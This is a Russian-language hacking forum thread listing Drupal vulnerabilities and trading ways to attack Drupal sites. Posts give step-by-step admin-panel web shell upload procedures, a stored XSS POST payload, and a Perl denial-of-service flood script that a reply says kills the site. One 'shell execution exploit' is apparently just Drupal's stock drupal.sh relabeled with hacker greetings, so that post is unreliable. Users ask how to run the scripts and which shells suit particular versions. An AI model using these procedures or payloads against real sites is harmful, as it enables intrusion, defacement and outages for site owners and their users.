[ Обзор Уязвимостей .:Drupal :. ]

Discussion in 'Веб-уязвимости' started by Cawabunga, 23 Feb 2008.

  1. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    узнаем версию
    http://path/CHANGELOG.txt
     
  2. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508

    отсортировано по убыванию по дате

    ===================
    HIGH

    Drupal Meta Tags Module command execution

    Обход ограничений безопасности в Drupal
    Удаленный пользователь может изменить данные профиля других пользователей.

    Drupal Site_Documentation_Module CVE-2008-2271

    Drupal Comment Upload Module

    ===================
    SQL-inj

    SQL-инъекция в Drupal

    SQL-инъекция в vbDrupal

    SQL-инъекция в Drupal Acidfree Module

    SQL-инъекция в Drupal Extended Tracker

    SQL-инъекция в Drupal Easylinks

    SQL-инъекция в Drupal Bibliography

    SQL-инъекция в Drupal Jobsearch

    SQL-инъекция и раскрытии е данных в Drupal

    ===================
    Multy

    Множественные уязвимости в vbDrupal

    Множественные уязвимости в Drupal

    Множественные уязвимости в Drupal

    Множественные уязвимости в Drupal

    Множественные уязвимости в Drupal

    Несколько уязвимостей в Drupal

    Несколько уязвимостей в Drupal Help Tip

    Несколько уязвимостей в Drupal IMCE

    ===================
    CSRF

    CSRF атака в Drupal Userpoints Module

    CSRF атака в Drupal BUEditor Module

    ===================
    XSS

    XSS Drupal Internationalization and Localizer

    XSS Drupal E-Publish Module

    XSS Drupal Ubercart Module

    XSS Drupal Webform Module

    XSS Drupal Flickr Module

    XSS Multiple Time Sheets

    XSS Drupal

    XSS Drupal Workflow Module

    XSS Drupal Archive Module

    XSS Drupal Shoutbox Module

    XSS Drupal Token

    XSS Drupal Web Links

    XSS Drupal Project Issue Tracking Module

    XSS Drupal

    XSS Drupal LoginToboggan Module

    XSS Drupal Project Module

    XSS Drupal MySite Module

    XSS Drupal Site Profile Directory

    XSS Drupal Search Keywords

    XSS Drupal Pathauto

    XSS Drupal E-commerce

    XSS Drupal Easylinks

    XSS Drupal Bibliography

    XSS Drupal Recipe Module

    XSS Drupal

    XSS Drupal webform Module

    XSS Drupal

    XSS Drupal

    ===================
    Module

    Drupal Simple Access Module

    Drupal Header Image Module
    Уязвимость позволяеть получить доступ к административной части приложения.

    Drupal Secure Site Module
    Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя.

    Drupal OpenID Module
    Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку.

    Drupal Forward Module
    Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении.

    Drupal Print Module
    Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям.

    Drupal Project Issue Tracking Module
    Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные.

    Drupal Nodefamily Module
    Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL.

    Drupal Textimage Module
    Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе.

    Drupal Captcha Module
    Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha.

    Drupal Pubcookie Module
    Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации.

    Drupal Form_mail Module
    Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение.

     
    #3 Elekt, 22 May 2008
    Last edited: 22 May 2008
  3. kirufka

    kirufka New Member

    Joined:
    18 Aug 2008
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    вот так версию узнать можно:
    Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка:
    define('VERSION', 'ТУТ ВЕРСИЯ');
    Если строчки нет, то версия ниже 4.7.0
    Дополню пост:
    в некоторых модулях написана версия, к примеру:
    site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё.
    З.Ы. почему бы не прикрепить тему, тоже нужная вещь
     
    #4 kirufka, 1 Dec 2008
    Last edited: 1 Dec 2008
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Drupal 6.14 - заливка шелла из админпанели

    1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration

    2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных

    3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published)

    4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt)

    5) http://drupal.ru/sites/default/files/shell.php3 - шелл

    6) Administer->Content management->Удаляем страницу
     
    3 people like this.
  5. zerg

    zerg Elder - Старейшина

    Joined:
    5 Mar 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
    Code:
    # $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
     
  6. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    ещё один способ загрузки шела

    ещё один способ загрузки шела:
    Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php
    Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп
     
    1 person likes this.
  7. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Drupal 7.0 Shell Execution Script

    PHP:
    #!/usr/bin/env php
    <?php
     
    /**
     * Drupal 7.0 Shell Execution Script
     * ================
     * By KedAns-Dz <[email protected]>
     * ================
     * (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh 
     * The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts
     * ================
     * ------------------------
     * Check for your PHP interpreter - on Windows you'll probably have to
     * replace line 1 with : 
     * #!c:/program files/php/php.exe
     * @param path  Drupal's absolute root directory in local file system (optional).
     * @param URI   A URI to execute, including HTTP protocol prefix.
     */
    $script basename(array_shift($_SERVER['argv']));
     
    if (
    in_array('--help'$_SERVER['argv']) || empty($_SERVER['argv'])) {
      echo <<<EOF
     
    Execute a Drupal page from the shell.
     
    Usage:        
    {$script} [OPTIONS] "<URI>"
    Example:      
    {$script} "http://target.org/node"
     
    All arguments are long options.
     
      --help      This page.
     
      --root      Set the working directory for the script to the specified path.
                  To execute Drupal this has to be the root directory of your
                  Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal
                  running on Unix). Current directory is not required.
                  Use surrounding quotation marks on Windows.
     
      --verbose   This option displays the options as they are set, but will
                  produce errors from setting the session.
     
      URI         The URI to execute, i.e. http://default/foo/bar for executing
                  the path '/foo/bar' in your site 'default'. URI has to be
                  enclosed by quotation marks if there are ampersands in it
                  (f.e. index.php?q=node&foo=bar). Prefix 'http://' is required,
                  and the domain must exist in Drupal's sites-directory.
     
                  If the given path and file exists it will be executed directly,
                  i.e. if URI is set to http://default/bar/foo.php
                  and bar/foo.php exists, this script will be executed without
                  bootstrapping Drupal. To execute Drupal's cron.php, specify
                  http://default/cron.php as the URI.
     
     
    To run this script without --root argument invoke it from the root directory
    of your Drupal installation with
     
      ./scripts/
    {$script}
    n
    EOF;
      exit;
    }
     
    // define default settings
    $cmd 'index.php';
    $_SERVER['HTTP_HOST']       = 'default';
    $_SERVER['PHP_SELF']        = '/index.php';
    $_SERVER['REMOTE_ADDR']     = '127.0.0.1';
    $_SERVER['SERVER_SOFTWARE'] = NULL;
    $_SERVER['REQUEST_METHOD']  = 'GET';
    $_SERVER['QUERY_STRING']    = '';
    $_SERVER['PHP_SELF']        = $_SERVER['REQUEST_URI'] = '/';
    $_SERVER['HTTP_USER_AGENT'] = 'console';
     
    // toggle verbose mode
    if (in_array('--verbose'$_SERVER['argv'])) {
      
    $_verbose_mode true;
    }
    else {
      
    $_verbose_mode false;
    }
     
    // parse invocation arguments
    while ($param array_shift($_SERVER['argv'])) {
      switch (
    $param) {
        case 
    '--root':
          
    // change working directory
          
    $path array_shift($_SERVER['argv']);
          if (
    is_dir($path)) {
            
    chdir($path);
            if (
    $_verbose_mode) {
              echo 
    "cwd changed to: {$path}n";
            }
          }
          else {
            echo 
    "nERROR: {$path} not found.nn";
          }
          break;
     
        default:
          if (
    substr($param02) == '--') {
            
    // ignore unknown options
            
    break;
          }
          else {
            
    // parse the URI
            
    $path parse_url($param);
     
            
    // set site name
            
    if (isset($path['host'])) {
              
    $_SERVER['HTTP_HOST'] = $path['host'];
            }
     
            
    // set query string
            
    if (isset($path['query'])) {
              
    $_SERVER['QUERY_STRING'] = $path['query'];
              
    parse_str($path['query'], $_GET);
              
    $_REQUEST $_GET;
            }
     
            
    // set file to execute or Drupal path (clean urls enabled)
            
    if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
              
    $_SERVER['PHP_SELF'] = $_SERVER['REQUEST_URI'] = $path['path'];
              
    $cmd substr($path['path'], 1);
            }
            elseif (isset(
    $path['path'])) {
              if (!isset(
    $_GET['q'])) {
                
    $_REQUEST['q'] = $_GET['q'] = $path['path'];
              }
            }
     
            
    // display setup in verbose mode
            
    if ($_verbose_mode) {
              echo 
    "Hostname set to: {$_SERVER['HTTP_HOST']}n";
              echo 
    "Script name set to: {$cmd}n";
              echo 
    "Path set to: {$_GET['q']}n";
            }
          }
          break;
      }
    }
     
    if (
    file_exists($cmd)) {
      include 
    $cmd;
    }
    else {
      echo 
    "nERROR: {$cmd} not found.nn";
    }
    exit();
    /***============================================================================================
    ***================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
    * Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
    * Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
    * Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
    * Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com)
    * Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
    * Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
    * Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
    * 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com 
    * www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
    *================================================================================================
    */
    4символа
     
  8. mr.Penguin

    mr.Penguin Member

    Joined:
    8 Mar 2012
    Messages:
    40
    Likes Received:
    37
    Reputations:
    74
    Drupal 5.x, возможно более ранние версии.
    Уязвим параметр profile_big, field_location[0][city].

    POST:
    Code:
    www.site.ru/user/ID_пользователя/edit/О себе?form_build_id=&form_token=&form_id=&profile_=test&profile_big=<script>alert('XSS by mr.Penguin')</script>&op=Сохранить
    Далее нажмите на "Просмотр" и активная XSS выполнится :)

    Скриншоты:
    [​IMG] [​IMG]
     
    #9 mr.Penguin, 27 Mar 2012
    Last edited: 27 Mar 2012
    1 person likes this.
  9. Ice_Burn

    Ice_Burn Member

    Joined:
    10 Feb 2009
    Messages:
    217
    Likes Received:
    26
    Reputations:
    1
    Drupal 0-day Отказ в обслуживании

    PHP:
    1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0     _                   __           __       __                     1
    1   
    /' \            __  /'__`\        /\ \__  /'__`\                   0
    0  
    /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
    1  
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
    0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
    1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
    0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
    1                  \ \____/ >> Exploit database separated by exploit   0
    0                   \/___/          type (local, remote, DoS, etc.)    1
    1                                                                      1
    0  [+] Site            : 1337day.com                                   0
    1  [+] Support e-mail  : submit[at]1337day.com                         1
    0                                                                      0
    1               #########################################              1
    0               I'm Angel Injection member from Inj3ct0r Team          1
    1               #########################################              0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
    [+] title: Drupal 0-day Denial Of Service
    [-] author: Angel Injection
    [-] Security -::RISK: high

    ---------perl code----------------

    #!/usr/bin/perl
    use Socket;
    if (@ARGV < 2) { &usage }
    $rand=rand(10);
    $host = $ARGV[0];
    $dir = $ARGV[1];
    $host =~ s/(http:\/\/)//eg;
    for (
    $i=0; $i<10; $i--)
    {
    $user="Drupal".$rand.$i;
    $data = "s="
    ;
    $len = length $data;
    $foo = "POST ".$dir."index.php HTTP/1.1\r\n".
    "Accept: */*\r\n".
    "Accept-Language: en-gb\r\n".
    "Content-Type: application/x-www-form-urlencoded\r\n".
    "Accept-Encoding: gzip, deflate\r\n".
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
    "Host: 
    $host\r\n".
    "Content-Length: 
    $len\r\n".
    "Connection: Keep-Alive\r\n".
    "Cache-Control: no-cache\r\n\r\n".
    "
    $data";
    my 
    $port = "80";
    my 
    $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, 
    $proto);
    connect(SOCKET, sockaddr_in(
    $port, inet_aton($host))) || redo;
    send(SOCKET,"
    $foo", 0);
    syswrite STDOUT, "+" ;
    }
    print "\n\n";
    system('ping 
    $host');
    sub usage {
    print "\t$0 <host> </dir/>\n";
    print "\tex: $0 127.0.0.1 /Drupal/\n";
    print "\tex2: $0 127.0.0.1 /\n\n";
    exit();
    };


    # 1337day.com [2012-05-05]
    Линк: 1337day.com/exploits/18201
     
    1 person likes this.
  10. -loony-

    -loony- New Member

    Joined:
    15 Jun 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А как работать с этим скриптом и какой принцип его действия? Будьте так добры, поясните, пожалуйста. Интерпретатор стоит, запуск из командной строки, так? В нем что-то нужно дописывать?
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Denial of Service. Убивает сайт.
     
  12. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    есть ли какая нибудь уязвимость в версии 6.24?
     
  13. MrCepbIu

    MrCepbIu Banned

    Joined:
    24 Feb 2010
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    http://forum.antichat.ru/showpost.php?p=3020365&postcount=8
    не понял, что он делает? как работает? и ещё не запускается
    Code:
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    #!/usr/bin/php
    PHP Fatal error:  Allowed memory size of 134217728 bytes exhausted (tried to allocate 19456 bytes) in /tmp/index.php on line 80
    и попутный вопрос, нет ни чего на 6.22?
     
    #14 MrCepbIu, 13 Sep 2012
    Last edited: 13 Sep 2012
  14. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    какие способы есть заливки шелла?
     
  15. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    а в чем проблема? редактор страниц потдерживает php.
     
  16. tripwired

    tripwired New Member

    Joined:
    13 Nov 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    надо попробовать

    [​IMG]
     
  17. ZeR0ChanNeL

    ZeR0ChanNeL Banned

    Joined:
    1 Jan 2013
    Messages:
    55
    Likes Received:
    2
    Reputations:
    0
    drupal 7.15,раскрытие путей
     
  18. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    499
    Likes Received:
    60
    Reputations:
    53
    Что в бд drupal 6,28 отвечает за ретрив пароля? Пишется там куда-нибудь хеш или как? Движок пока скачать не могу(
     
  19. studioz

    studioz New Member

    Joined:
    24 Feb 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Drupal 7.22 тоже работает, похоже на всю 7 ветку действует.